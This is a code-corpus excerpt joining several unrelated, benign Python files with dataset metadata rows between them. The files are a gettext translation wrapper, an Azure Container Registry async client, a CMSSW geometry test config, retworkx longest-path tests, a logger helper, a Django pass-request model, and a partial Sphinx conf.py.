from constants import LOCALE_DIR
class Lang(Observable):
    """Observable gettext wrapper: translates strings via ``_("text")`` and
    re-triggers kv rules bound to the pseudo-property "_" on language switch.
    """
    # Class-level (shared) observer list of (func, largs, kwargs) tuples.
    observers = []
    # Active language code; set per instance in __init__.
    lang = None
    def __init__(self, defaultlang, transalte=None):
        """Set up translation with *defaultlang*.

        NOTE(review): 'transalte' is a typo for 'translate'; kept for
        keyword-argument compatibility.  When None, plain gettext.gettext
        is used until switch_lang installs a catalog.
        """
        super(Lang, self).__init__()
        self.ugettext = None
        self.lang = defaultlang
        self._translate = transalte if transalte is not None else gettext.gettext
        self.switch_lang(self.lang)
    def __call__(self, text):
        """Translate *text* with the current translation function."""
        return self._translate(text)
    def fbind(self, name, func, *largs, **kwargs):
        # "_" is a pseudo-property: record the binding locally instead of
        # delegating to Observable.
        if name == "_":
            self.observers.append((func, largs, kwargs))
        else:
            return super(Lang, self).fbind(name, func, *largs, **kwargs)
    def funbind(self, name, func, *largs, **kwargs):
        # Mirror of fbind: drop a previously recorded "_" binding.
        if name == "_":
            key = (func, largs, kwargs)
            if key in self.observers:
                self.observers.remove(key)
        else:
            return super(Lang, self).funbind(name, func, *largs, **kwargs)
    def switch_lang(self, lang):
        """Load the 'Deep3DPhoto' catalog for *lang* and refresh observers."""
        locales = gettext.translation('Deep3DPhoto', LOCALE_DIR, languages=[lang])
        self.ugettext = locales.gettext
        # Re-fire every kv rule attached to the "_" binding.
        for func, largs, kwargs in self.observers:
            func(largs, None, None)
| true | true |
f710013e8fda200cf47f10c609828756146e2766 | 7,377 | py | Python | sdk/containerregistry/azure-mgmt-containerregistry/azure/mgmt/containerregistry/v2020_11_01_preview/aio/_container_registry_management_client.py | rsdoherty/azure-sdk-for-python | 6bba5326677468e6660845a703686327178bb7b1 | [
"MIT"
] | 2,728 | 2015-01-09T10:19:32.000Z | 2022-03-31T14:50:33.000Z | sdk/containerregistry/azure-mgmt-containerregistry/azure/mgmt/containerregistry/v2020_11_01_preview/aio/_container_registry_management_client.py | rsdoherty/azure-sdk-for-python | 6bba5326677468e6660845a703686327178bb7b1 | [
"MIT"
] | 17,773 | 2015-01-05T15:57:17.000Z | 2022-03-31T23:50:25.000Z | sdk/containerregistry/azure-mgmt-containerregistry/azure/mgmt/containerregistry/v2020_11_01_preview/aio/_container_registry_management_client.py | rsdoherty/azure-sdk-for-python | 6bba5326677468e6660845a703686327178bb7b1 | [
"MIT"
] | 1,916 | 2015-01-19T05:05:41.000Z | 2022-03-31T19:36:44.000Z | # coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is regenerated.
# --------------------------------------------------------------------------
from typing import Any, Optional, TYPE_CHECKING
from azure.core.pipeline.transport import AsyncHttpResponse, HttpRequest
from azure.mgmt.core import AsyncARMPipelineClient
from msrest import Deserializer, Serializer
if TYPE_CHECKING:
# pylint: disable=unused-import,ungrouped-imports
from azure.core.credentials_async import AsyncTokenCredential
from ._configuration import ContainerRegistryManagementClientConfiguration
from .operations import ConnectedRegistriesOperations
from .operations import ExportPipelinesOperations
from .operations import RegistriesOperations
from .operations import ImportPipelinesOperations
from .operations import Operations
from .operations import PipelineRunsOperations
from .operations import PrivateEndpointConnectionsOperations
from .operations import ReplicationsOperations
from .operations import ScopeMapsOperations
from .operations import TokensOperations
from .operations import WebhooksOperations
from .. import models
class ContainerRegistryManagementClient(object):
    """Async management client for Azure Container Registry
    (API version 2020-11-01-preview).

    Exposes one attribute per operation group (``connected_registries``,
    ``export_pipelines``, ``registries``, ``import_pipelines``,
    ``operations``, ``pipeline_runs``, ``private_endpoint_connections``,
    ``replications``, ``scope_maps``, ``tokens``, ``webhooks``), all wired
    to the shared pipeline, configuration and (de)serializers built in
    ``__init__``.

    :param credential: Credential needed for the client to connect to Azure.
    :type credential: ~azure.core.credentials_async.AsyncTokenCredential
    :param subscription_id: The Microsoft Azure subscription ID.
    :type subscription_id: str
    :param str base_url: Service URL; defaults to the public ARM endpoint.
    :keyword int polling_interval: Default waiting time between two polls for LRO operations if no Retry-After header is present.
    """

    def __init__(
        self,
        credential: "AsyncTokenCredential",
        subscription_id: str,
        base_url: Optional[str] = None,
        **kwargs: Any
    ) -> None:
        self._config = ContainerRegistryManagementClientConfiguration(credential, subscription_id, **kwargs)
        # Fall back to the public-cloud ARM endpoint when no URL is given.
        self._client = AsyncARMPipelineClient(
            base_url=base_url or 'https://management.azure.com',
            config=self._config,
            **kwargs)

        # Register every model class for (de)serialization.
        client_models = {name: obj for name, obj in vars(models).items() if isinstance(obj, type)}
        self._serialize = Serializer(client_models)
        self._serialize.client_side_validation = False
        self._deserialize = Deserializer(client_models)

        # Every operation group shares the same pipeline/config/serializers.
        shared = (self._client, self._config, self._serialize, self._deserialize)
        self.connected_registries = ConnectedRegistriesOperations(*shared)
        self.export_pipelines = ExportPipelinesOperations(*shared)
        self.registries = RegistriesOperations(*shared)
        self.import_pipelines = ImportPipelinesOperations(*shared)
        self.operations = Operations(*shared)
        self.pipeline_runs = PipelineRunsOperations(*shared)
        self.private_endpoint_connections = PrivateEndpointConnectionsOperations(*shared)
        self.replications = ReplicationsOperations(*shared)
        self.scope_maps = ScopeMapsOperations(*shared)
        self.tokens = TokensOperations(*shared)
        self.webhooks = WebhooksOperations(*shared)

    async def _send_request(self, http_request: HttpRequest, **kwargs: Any) -> AsyncHttpResponse:
        """Runs the network request through the client's chained policies.

        :param http_request: The network request you want to make. Required.
        :type http_request: ~azure.core.pipeline.transport.HttpRequest
        :keyword bool stream: Whether the response payload will be streamed. Defaults to True.
        :return: The response of your network call. Does not do error handling on your response.
        :rtype: ~azure.core.pipeline.transport.AsyncHttpResponse
        """
        # Substitute the subscription into templated request URLs.
        url_kwargs = {
            'subscriptionId': self._serialize.url(
                "self._config.subscription_id", self._config.subscription_id, 'str'),
        }
        http_request.url = self._client.format_url(http_request.url, **url_kwargs)
        stream = kwargs.pop("stream", True)
        pipeline_response = await self._client._pipeline.run(http_request, stream=stream, **kwargs)
        return pipeline_response.http_response

    async def close(self) -> None:
        """Close the underlying pipeline client."""
        await self._client.close()

    async def __aenter__(self) -> "ContainerRegistryManagementClient":
        await self._client.__aenter__()
        return self

    async def __aexit__(self, *exc_details) -> None:
        await self._client.__aexit__(*exc_details)
| 55.466165 | 143 | 0.755456 |
from typing import Any, Optional, TYPE_CHECKING
from azure.core.pipeline.transport import AsyncHttpResponse, HttpRequest
from azure.mgmt.core import AsyncARMPipelineClient
from msrest import Deserializer, Serializer
if TYPE_CHECKING:
from azure.core.credentials_async import AsyncTokenCredential
from ._configuration import ContainerRegistryManagementClientConfiguration
from .operations import ConnectedRegistriesOperations
from .operations import ExportPipelinesOperations
from .operations import RegistriesOperations
from .operations import ImportPipelinesOperations
from .operations import Operations
from .operations import PipelineRunsOperations
from .operations import PrivateEndpointConnectionsOperations
from .operations import ReplicationsOperations
from .operations import ScopeMapsOperations
from .operations import TokensOperations
from .operations import WebhooksOperations
from .. import models
class ContainerRegistryManagementClient(object):
    """Async management client for Azure Container Registry
    (API version 2020-11-01-preview).

    One attribute per operation group (``registries``, ``webhooks``, ...),
    each sharing the pipeline client, configuration and (de)serializers
    created in ``__init__``.
    """
    def __init__(
        self,
        credential: "AsyncTokenCredential",
        subscription_id: str,
        base_url: Optional[str] = None,
        **kwargs: Any
    ) -> None:
        """
        :param credential: Credential needed for the client to connect to Azure.
        :param subscription_id: The Microsoft Azure subscription ID.
        :param base_url: Service URL; defaults to the public ARM endpoint.
        """
        # Default to the public-cloud ARM endpoint when no URL is supplied.
        if not base_url:
            base_url = 'https://management.azure.com'
        self._config = ContainerRegistryManagementClientConfiguration(credential, subscription_id, **kwargs)
        self._client = AsyncARMPipelineClient(base_url=base_url, config=self._config, **kwargs)
        # Register every model class for (de)serialization.
        client_models = {k: v for k, v in models.__dict__.items() if isinstance(v, type)}
        self._serialize = Serializer(client_models)
        self._serialize.client_side_validation = False
        self._deserialize = Deserializer(client_models)
        # Each operation group receives the same pipeline/config/serializers.
        self.connected_registries = ConnectedRegistriesOperations(
            self._client, self._config, self._serialize, self._deserialize)
        self.export_pipelines = ExportPipelinesOperations(
            self._client, self._config, self._serialize, self._deserialize)
        self.registries = RegistriesOperations(
            self._client, self._config, self._serialize, self._deserialize)
        self.import_pipelines = ImportPipelinesOperations(
            self._client, self._config, self._serialize, self._deserialize)
        self.operations = Operations(
            self._client, self._config, self._serialize, self._deserialize)
        self.pipeline_runs = PipelineRunsOperations(
            self._client, self._config, self._serialize, self._deserialize)
        self.private_endpoint_connections = PrivateEndpointConnectionsOperations(
            self._client, self._config, self._serialize, self._deserialize)
        self.replications = ReplicationsOperations(
            self._client, self._config, self._serialize, self._deserialize)
        self.scope_maps = ScopeMapsOperations(
            self._client, self._config, self._serialize, self._deserialize)
        self.tokens = TokensOperations(
            self._client, self._config, self._serialize, self._deserialize)
        self.webhooks = WebhooksOperations(
            self._client, self._config, self._serialize, self._deserialize)
    async def _send_request(self, http_request: HttpRequest, **kwargs: Any) -> AsyncHttpResponse:
        """Run *http_request* through the client's chained policies and
        return the raw response (no error handling is applied).
        """
        # Substitute the subscription into templated request URLs.
        path_format_arguments = {
            'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
        }
        http_request.url = self._client.format_url(http_request.url, **path_format_arguments)
        stream = kwargs.pop("stream", True)
        pipeline_response = await self._client._pipeline.run(http_request, stream=stream, **kwargs)
        return pipeline_response.http_response
    async def close(self) -> None:
        """Close the underlying pipeline client."""
        await self._client.close()
    async def __aenter__(self) -> "ContainerRegistryManagementClient":
        await self._client.__aenter__()
        return self
    async def __aexit__(self, *exc_details) -> None:
        await self._client.__aexit__(*exc_details)
| true | true |
f71001c69e6b9033c61079b91a451817bc6a6ed7 | 3,311 | py | Python | Geometry/MTDCommonData/test/testMTDinDD4hep.py | SWuchterl/cmssw | 769b4a7ef81796579af7d626da6039dfa0347b8e | [
"Apache-2.0"
] | 6 | 2017-09-08T14:12:56.000Z | 2022-03-09T23:57:01.000Z | Geometry/MTDCommonData/test/testMTDinDD4hep.py | SWuchterl/cmssw | 769b4a7ef81796579af7d626da6039dfa0347b8e | [
"Apache-2.0"
] | 545 | 2017-09-19T17:10:19.000Z | 2022-03-07T16:55:27.000Z | Geometry/MTDCommonData/test/testMTDinDD4hep.py | SWuchterl/cmssw | 769b4a7ef81796579af7d626da6039dfa0347b8e | [
"Apache-2.0"
] | 14 | 2017-10-04T09:47:21.000Z | 2019-10-23T18:04:45.000Z | import FWCore.ParameterSet.Config as cms
# cmsRun configuration: exercise the MTD (MIP Timing Detector) DD4hep
# geometry for both barrel (BTL) and endcap (ETL) in one event.
process = cms.Process("CompareGeometryTest")
# No event data needed: the geometry is loaded from the XML below.
process.source = cms.Source("EmptySource")
process.maxEvents = cms.untracked.PSet(
    input = cms.untracked.int32(1)
)
# Send the MTD test categories both to stdout and to a dedicated
# 'mtdCommonDataDD4hep' destination (limit -1 = unlimited, 0 = suppressed).
process.MessageLogger = cms.Service(
    "MessageLogger",
    statistics = cms.untracked.vstring('cout'),
    categories = cms.untracked.vstring('MTDUnitTest',
                                       'DD4hep_TestMTDIdealGeometry',
                                       'DD4hep_TestMTDPath',
                                       'DD4hep_TestMTDNumbering',
                                       'DD4hep_TestMTDPosition'),
    cout = cms.untracked.PSet(
        threshold = cms.untracked.string('INFO'),
        INFO = cms.untracked.PSet(
            limit = cms.untracked.int32(0)
        ),
        DD4hep_TestMTDIdealGeometry = cms.untracked.PSet(
            limit = cms.untracked.int32(-1)
        ),
        DD4hep_TestMTDPath = cms.untracked.PSet(
            limit = cms.untracked.int32(-1)
        ),
        DD4hep_TestMTDNumbering = cms.untracked.PSet(
            limit = cms.untracked.int32(-1)
        ),
        DD4hep_TestMTDPosition = cms.untracked.PSet(
            limit = cms.untracked.int32(-1)
        ),
        noLineBreaks = cms.untracked.bool(True)
    ),
    mtdCommonDataDD4hep = cms.untracked.PSet(
        INFO = cms.untracked.PSet(
            limit = cms.untracked.int32(0)
        ),
        noLineBreaks = cms.untracked.bool(True),
        DEBUG = cms.untracked.PSet(
            limit = cms.untracked.int32(0)
        ),
        WARNING = cms.untracked.PSet(
            limit = cms.untracked.int32(0)
        ),
        ERROR = cms.untracked.PSet(
            limit = cms.untracked.int32(0)
        ),
        threshold = cms.untracked.string('INFO'),
        MTDUnitTest = cms.untracked.PSet(
            limit = cms.untracked.int32(-1)
        ),
    ),
    destinations = cms.untracked.vstring('cout',
                                         'mtdCommonDataDD4hep')
)
# Load the DD4hep detector description from the MTD geometry XML, labelled 'MTD'.
process.DDDetectorESProducer = cms.ESSource("DDDetectorESProducer",
                                            confGeomXMLFiles = cms.FileInPath('Geometry/MTDCommonData/data/dd4hep/cms-mtdD50-geometry.xml'),
                                            appendToDataLabel = cms.string('MTD')
                                            )
process.DDSpecParRegistryESProducer = cms.ESProducer("DDSpecParRegistryESProducer",
                                                     appendToDataLabel = cms.string('MTD')
                                                     )
# Run the same geometry test analyzer on both detector halves.
process.testBTL = cms.EDAnalyzer("DD4hep_TestMTDIdealGeometry",
                                 DDDetector = cms.ESInputTag('','MTD'),
                                 ddTopNodeName = cms.untracked.string('BarrelTimingLayer'),
                                 theLayout = cms.untracked.uint32(4)
                                 )
process.testETL = cms.EDAnalyzer("DD4hep_TestMTDIdealGeometry",
                                 DDDetector = cms.ESInputTag('','MTD'),
                                 ddTopNodeName = cms.untracked.string('EndcapTimingLayer'),
                                 theLayout = cms.untracked.uint32(4)
                                 )
process.Timing = cms.Service("Timing")
process.p1 = cms.Path(process.testBTL+process.testETL)
| 38.952941 | 140 | 0.534884 | import FWCore.ParameterSet.Config as cms
# cmsRun configuration: exercise the MTD (MIP Timing Detector) DD4hep
# geometry for both barrel (BTL) and endcap (ETL) in one event.
process = cms.Process("CompareGeometryTest")
# No event data needed: the geometry is loaded from the XML below.
process.source = cms.Source("EmptySource")
process.maxEvents = cms.untracked.PSet(
    input = cms.untracked.int32(1)
)
# Send the MTD test categories both to stdout and to a dedicated
# 'mtdCommonDataDD4hep' destination (limit -1 = unlimited, 0 = suppressed).
process.MessageLogger = cms.Service(
    "MessageLogger",
    statistics = cms.untracked.vstring('cout'),
    categories = cms.untracked.vstring('MTDUnitTest',
                                       'DD4hep_TestMTDIdealGeometry',
                                       'DD4hep_TestMTDPath',
                                       'DD4hep_TestMTDNumbering',
                                       'DD4hep_TestMTDPosition'),
    cout = cms.untracked.PSet(
        threshold = cms.untracked.string('INFO'),
        INFO = cms.untracked.PSet(
            limit = cms.untracked.int32(0)
        ),
        DD4hep_TestMTDIdealGeometry = cms.untracked.PSet(
            limit = cms.untracked.int32(-1)
        ),
        DD4hep_TestMTDPath = cms.untracked.PSet(
            limit = cms.untracked.int32(-1)
        ),
        DD4hep_TestMTDNumbering = cms.untracked.PSet(
            limit = cms.untracked.int32(-1)
        ),
        DD4hep_TestMTDPosition = cms.untracked.PSet(
            limit = cms.untracked.int32(-1)
        ),
        noLineBreaks = cms.untracked.bool(True)
    ),
    mtdCommonDataDD4hep = cms.untracked.PSet(
        INFO = cms.untracked.PSet(
            limit = cms.untracked.int32(0)
        ),
        noLineBreaks = cms.untracked.bool(True),
        DEBUG = cms.untracked.PSet(
            limit = cms.untracked.int32(0)
        ),
        WARNING = cms.untracked.PSet(
            limit = cms.untracked.int32(0)
        ),
        ERROR = cms.untracked.PSet(
            limit = cms.untracked.int32(0)
        ),
        threshold = cms.untracked.string('INFO'),
        MTDUnitTest = cms.untracked.PSet(
            limit = cms.untracked.int32(-1)
        ),
    ),
    destinations = cms.untracked.vstring('cout',
                                         'mtdCommonDataDD4hep')
)
# Load the DD4hep detector description from the MTD geometry XML, labelled 'MTD'.
process.DDDetectorESProducer = cms.ESSource("DDDetectorESProducer",
                                            confGeomXMLFiles = cms.FileInPath('Geometry/MTDCommonData/data/dd4hep/cms-mtdD50-geometry.xml'),
                                            appendToDataLabel = cms.string('MTD')
                                            )
process.DDSpecParRegistryESProducer = cms.ESProducer("DDSpecParRegistryESProducer",
                                                     appendToDataLabel = cms.string('MTD')
                                                     )
# Run the same geometry test analyzer on both detector halves.
process.testBTL = cms.EDAnalyzer("DD4hep_TestMTDIdealGeometry",
                                 DDDetector = cms.ESInputTag('','MTD'),
                                 ddTopNodeName = cms.untracked.string('BarrelTimingLayer'),
                                 theLayout = cms.untracked.uint32(4)
                                 )
process.testETL = cms.EDAnalyzer("DD4hep_TestMTDIdealGeometry",
                                 DDDetector = cms.ESInputTag('','MTD'),
                                 ddTopNodeName = cms.untracked.string('EndcapTimingLayer'),
                                 theLayout = cms.untracked.uint32(4)
                                 )
process.Timing = cms.Service("Timing")
process.p1 = cms.Path(process.testBTL+process.testETL)
| true | true |
f71002071aa31f475e86d1779639faaa7bdb84e1 | 2,371 | py | Python | tests/digraph/test_depth.py | georgios-ts/retworkx | 8efe47c8ffaa2bdf1730ad50ada389bf9ca15229 | [
"Apache-2.0"
] | null | null | null | tests/digraph/test_depth.py | georgios-ts/retworkx | 8efe47c8ffaa2bdf1730ad50ada389bf9ca15229 | [
"Apache-2.0"
] | null | null | null | tests/digraph/test_depth.py | georgios-ts/retworkx | 8efe47c8ffaa2bdf1730ad50ada389bf9ca15229 | [
"Apache-2.0"
] | null | null | null | # Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import unittest
import retworkx
class TestLongestPath(unittest.TestCase):
    """Unit tests for retworkx's longest-path helpers on DAGs."""

    def test_linear(self):
        """A mostly linear dag with two dead-end branches.

        a -> b -> c -> e -> f is the longest path (length 4); d hangs
        off b and g hangs off c.
        """
        dag = retworkx.PyDAG()
        a = dag.add_node("a")
        b = dag.add_child(a, "b", {})
        c = dag.add_child(b, "c", {})
        dag.add_child(b, "d", {})
        e = dag.add_child(c, "e", {})
        f = dag.add_child(e, "f", {})
        dag.add_child(c, "g", {})
        self.assertEqual(4, retworkx.dag_longest_path_length(dag))
        self.assertEqual([a, b, c, e, f], retworkx.dag_longest_path(dag))

    def test_less_linear(self):
        """Skip edges must not shorten the reported longest path."""
        dag = retworkx.PyDAG()
        a = dag.add_node("a")
        b = dag.add_child(a, "b", {})
        c = dag.add_child(b, "c", {})
        d = dag.add_child(c, "d", {})
        e = dag.add_child(d, "e", {})
        # Shortcut edges that bypass parts of the chain.
        for src, dst in ((a, c), (a, e), (c, e)):
            dag.add_edge(src, dst, {})
        self.assertEqual(4, retworkx.dag_longest_path_length(dag))
        self.assertEqual([a, b, c, d, e], retworkx.dag_longest_path(dag))

    def test_degenerate_graph(self):
        """A single node is a path of length zero."""
        dag = retworkx.PyDAG()
        dag.add_node(0)
        self.assertEqual(0, retworkx.dag_longest_path_length(dag))
        self.assertEqual([0], retworkx.dag_longest_path(dag))

    def test_empty_graph(self):
        """An empty dag has an empty longest path."""
        dag = retworkx.PyDAG()
        self.assertEqual(0, retworkx.dag_longest_path_length(dag))
        self.assertEqual([], retworkx.dag_longest_path(dag))
| 32.930556 | 75 | 0.6124 |
import unittest
import retworkx
class TestLongestPath(unittest.TestCase):
    """Tests for retworkx.dag_longest_path(_length) on directed acyclic graphs."""
    def test_linear(self):
        """Mostly linear dag: a->b->c->e->f is the longest path (length 4),
        with dead-end branches d (off b) and g (off c).
        """
        dag = retworkx.PyDAG()
        node_a = dag.add_node("a")
        node_b = dag.add_child(node_a, "b", {})
        node_c = dag.add_child(node_b, "c", {})
        dag.add_child(node_b, "d", {})
        node_e = dag.add_child(node_c, "e", {})
        node_f = dag.add_child(node_e, "f", {})
        dag.add_child(node_c, "g", {})
        self.assertEqual(4, retworkx.dag_longest_path_length(dag))
        self.assertEqual(
            [node_a, node_b, node_c, node_e, node_f],
            retworkx.dag_longest_path(dag),
        )
    def test_less_linear(self):
        """Chain a->b->c->d->e with shortcut edges; shortcuts must not
        shorten the reported longest path.
        """
        dag = retworkx.PyDAG()
        node_a = dag.add_node("a")
        node_b = dag.add_child(node_a, "b", {})
        node_c = dag.add_child(node_b, "c", {})
        node_d = dag.add_child(node_c, "d", {})
        node_e = dag.add_child(node_d, "e", {})
        # Shortcut edges that bypass parts of the chain.
        dag.add_edge(node_a, node_c, {})
        dag.add_edge(node_a, node_e, {})
        dag.add_edge(node_c, node_e, {})
        self.assertEqual(4, retworkx.dag_longest_path_length(dag))
        self.assertEqual(
            [node_a, node_b, node_c, node_d, node_e],
            retworkx.dag_longest_path(dag),
        )
    def test_degenerate_graph(self):
        """A single node yields a zero-length path containing only itself."""
        dag = retworkx.PyDAG()
        dag.add_node(0)
        self.assertEqual(0, retworkx.dag_longest_path_length(dag))
        self.assertEqual([0], retworkx.dag_longest_path(dag))
    def test_empty_graph(self):
        """An empty dag yields an empty path of length zero."""
        dag = retworkx.PyDAG()
        self.assertEqual(0, retworkx.dag_longest_path_length(dag))
        self.assertEqual([], retworkx.dag_longest_path(dag))
f710059dee719252061de77a44f95f80a232bbe1 | 482 | py | Python | mmcap/utils/logger.py | hnp0411/mmcaptioning | 47bcdee3734cdaaa96a34e927cdec5cc43cab538 | [
"Apache-2.0"
] | null | null | null | mmcap/utils/logger.py | hnp0411/mmcaptioning | 47bcdee3734cdaaa96a34e927cdec5cc43cab538 | [
"Apache-2.0"
] | null | null | null | mmcap/utils/logger.py | hnp0411/mmcaptioning | 47bcdee3734cdaaa96a34e927cdec5cc43cab538 | [
"Apache-2.0"
] | null | null | null | import logging
from mmcv.utils import get_logger
def get_root_logger(log_file=None, log_level=logging.INFO):
    """Return the package-level ('mmcap') logger via mmcv's get_logger.

    Args:
        log_file (str, optional): File path of log. Defaults to None.
        log_level (int, optional): The level of logger.
            Defaults to logging.INFO.

    Returns:
        :obj:`logging.Logger`: The obtained logger.
    """
    return get_logger(name='mmcap', log_file=log_file, log_level=log_level)
| 22.952381 | 77 | 0.670124 | import logging
from mmcv.utils import get_logger
def get_root_logger(log_file=None, log_level=logging.INFO):
    """Get the package-level ('mmcap') logger via mmcv's get_logger.

    Args:
        log_file (str, optional): File path of log. Defaults to None.
        log_level (int, optional): The level of logger.
            Defaults to logging.INFO.

    Returns:
        :obj:`logging.Logger`: The obtained logger.
    """
    logger = get_logger(name='mmcap', log_file=log_file, log_level=log_level)
    return logger
| true | true |
f71006b40f042b75b7b313be0ca71bb1ccf5d8ae | 191 | py | Python | automated/__init__.py | gabrielfern/automated-leda-tasks | b50bb14d118d64ad7361b5eb8bee9cf248bc57cf | [
"MIT"
] | 9 | 2017-07-26T19:10:12.000Z | 2018-04-25T02:27:09.000Z | automated/__init__.py | gabrielfern/automated-leda-tasks | b50bb14d118d64ad7361b5eb8bee9cf248bc57cf | [
"MIT"
] | 3 | 2017-08-02T23:32:28.000Z | 2018-10-13T00:08:54.000Z | automated/__init__.py | hericlesme/automated-leda-tasks | f0759d310636d281789f05bac7c9c624b75ab0e5 | [
"MIT"
] | 1 | 2018-05-24T23:55:31.000Z | 2018-05-24T23:55:31.000Z | #!/usr/bin/env python
# -*- coding: utf-8 -*-
# Gabriel Fernandes <gabrielfernndss@gmail.com>
# Héricles Emanuel <hericles.me@gmail.com>
# Package __init__ does nothing on import; run directly it prints a marker.
if __name__ == '__main__':
    print('easter_egg!')
| 21.222222 | 47 | 0.680628 |
# Package __init__ does nothing on import; run directly it prints a marker.
if __name__ == '__main__':
    print('easter_egg!')
| true | true |
f710076e41e510dc6c2d749b607b512d2e7db9c3 | 1,706 | py | Python | passgen/models.py | diyajaiswal11/HackCorona | dc6f7803a77b7ce6325f8d61f5f4fe54076ea461 | [
"MIT"
] | 7 | 2020-04-06T13:00:14.000Z | 2021-08-07T04:26:53.000Z | passgen/models.py | diyajaiswal11/HackCorona | dc6f7803a77b7ce6325f8d61f5f4fe54076ea461 | [
"MIT"
] | 10 | 2020-04-07T07:07:44.000Z | 2022-03-12T00:22:47.000Z | passgen/models.py | diyajaiswal11/HackCorona | dc6f7803a77b7ce6325f8d61f5f4fe54076ea461 | [
"MIT"
] | 2 | 2020-04-03T08:36:34.000Z | 2021-07-27T19:22:15.000Z | from django.db import models
from django.utils import timezone
# (stored value, human-readable label) pairs for PassModel.passcategory.
category_choices = (
    ("Essential Services Pass", "Essential Services Pass"),
    ("Emergency Services Pass", "Emergency Services Pass"),
)
# (stored value, human-readable label) pairs for PassModel.subcategory.
subcategory_choices = (
    ("ATM/Banking", "ATM/Banking"),
    ("Delivery Worker", "Delivery Worker"),
    ("Fruit/Vegetable Vendor","Fruit/Vegetable Vendor"),
    ("Govt Officials","Govt Officials"),
    ("Grocery Vendor","Grocery Vendor"),
    ("Milk Vendor","Milk Vendor"),
    ("Health Worker","Health Worker"),
    ("IT/Tele Communication","IT/Tele Communication"),
    ("Municipal Services","Municipal Services"),
    ("Power/Electricity","Power/Electricity"),
    ("Sanitation","Sanitation"),
    ("Businessman","Businessman"),
)
# Create your models here.
class PassModel(models.Model):
    """A movement-pass application.

    Stores the applicant's identity/contact details, the requested pass
    category and supporting documents; ``checked`` tracks whether the
    application has been reviewed.
    """
    # Applicant identity and contact details.
    district = models.CharField(max_length=20, null=True)
    name = models.CharField(max_length=200, null=True)
    email = models.CharField(max_length=200, null=True)
    vehiclenumber = models.CharField(max_length=200, null=True)
    phonenumber = models.CharField(max_length=10, null=True)
    aadharcardnumber = models.CharField(max_length=12, null=True)
    address = models.CharField(max_length=200, null=True)
    # Free-text justification for the pass request.
    reason = models.CharField(max_length=200, null=True)
    issuedate = models.DateTimeField(default=timezone.now)
    # Category/subcategory restricted to the module-level choice tuples.
    passcategory = models.CharField(max_length=30, choices=category_choices)
    subcategory = models.CharField(max_length=30, choices=subcategory_choices)
    attachphoto = models.ImageField(upload_to='profile_pics')
    attachidproof = models.ImageField(upload_to='id_proof')
    # Fix: CharField defaults must be strings; the previous int 201301
    # relied on implicit coercion.  max_length kept as-is to avoid a
    # schema change for existing installs.
    uniquenumber = models.CharField(max_length=10000, default='201301')
    # Fix: use the proper boolean False instead of 0 (equivalent value).
    checked = models.BooleanField(default=False)
| 41.609756 | 78 | 0.736225 | from django.db import models
from django.utils import timezone
# (stored value, human-readable label) pairs for PassModel.passcategory.
category_choices = (
    ("Essential Services Pass", "Essential Services Pass"),
    ("Emergency Services Pass", "Emergency Services Pass"),
)
# (stored value, human-readable label) pairs for PassModel.subcategory.
subcategory_choices = (
    ("ATM/Banking", "ATM/Banking"),
    ("Delivery Worker", "Delivery Worker"),
    ("Fruit/Vegetable Vendor","Fruit/Vegetable Vendor"),
    ("Govt Officials","Govt Officials"),
    ("Grocery Vendor","Grocery Vendor"),
    ("Milk Vendor","Milk Vendor"),
    ("Health Worker","Health Worker"),
    ("IT/Tele Communication","IT/Tele Communication"),
    ("Municipal Services","Municipal Services"),
    ("Power/Electricity","Power/Electricity"),
    ("Sanitation","Sanitation"),
    ("Businessman","Businessman"),
)
class PassModel(models.Model):
    """A movement-pass application: applicant details, requested pass
    category, supporting documents, and review status (``checked``).
    """
    # Applicant identity and contact details.
    district=models.CharField(max_length=20,null=True)
    name=models.CharField(max_length=200,null=True)
    email=models.CharField(max_length=200,null=True)
    vehiclenumber=models.CharField(max_length=200,null=True)
    phonenumber=models.CharField(max_length=10,null=True)
    aadharcardnumber=models.CharField(max_length=12,null=True)
    address=models.CharField(max_length=200,null=True)
    # Free-text justification for the pass request.
    reason=models.CharField(max_length=200,null=True)
    issuedate=models.DateTimeField(default=timezone.now)
    # Category/subcategory restricted to the module-level choice tuples.
    passcategory=models.CharField(max_length=30,choices = category_choices)
    subcategory=models.CharField(max_length=30,choices = subcategory_choices)
    attachphoto=models.ImageField(upload_to='profile_pics')
    attachidproof=models.ImageField(upload_to='id_proof')
    # NOTE(review): int default on a CharField relies on implicit
    # coercion; '201301' (a string) would be the correct type.
    uniquenumber=models.CharField(max_length=10000,default=201301)
    # NOTE(review): 0 is used where False is conventional for BooleanField.
    checked=models.BooleanField(default=0)
| true | true |
f71008c40263271753ec152fe0f9a5a57343a4fd | 6,627 | py | Python | docs/conf.py | scipp/scippnexus | 978b3b671355f55f94eb9d79f2ffe5cf793605ba | [
"BSD-3-Clause"
] | null | null | null | docs/conf.py | scipp/scippnexus | 978b3b671355f55f94eb9d79f2ffe5cf793605ba | [
"BSD-3-Clause"
] | null | null | null | docs/conf.py | scipp/scippnexus | 978b3b671355f55f94eb9d79f2ffe5cf793605ba | [
"BSD-3-Clause"
] | null | null | null | # -*- coding: utf-8 -*-
# Sphinx configuration for building the scippnexus documentation.
import doctest
from datetime import date
import scippnexus

# Link each rendered page back to its source file.
html_show_sourcelink = True

# Sphinx extensions used by this documentation build.
extensions = [
    'sphinx.ext.autodoc',
    'sphinx.ext.autosummary',
    'sphinx.ext.doctest',
    'sphinx.ext.intersphinx',
    'sphinx.ext.mathjax',
    'sphinx.ext.napoleon',
    'sphinx_autodoc_typehints',
    'sphinx_copybutton',
    'nbsphinx',
]

# Keep these alias names verbatim in rendered signatures instead of
# expanding them to their underlying definitions.
autodoc_type_aliases = {
    'VariableLike': 'VariableLike',
    'MetaDataMap': 'MetaDataMap',
    'array_like': 'array_like',
}

# Substitutions appended to every reST source file.
rst_epilog = f"""
.. |SCIPP_RELEASE_MONTH| replace:: {date.today().strftime("%B %Y")}
.. |SCIPP_VERSION| replace:: {scippnexus.__version__}
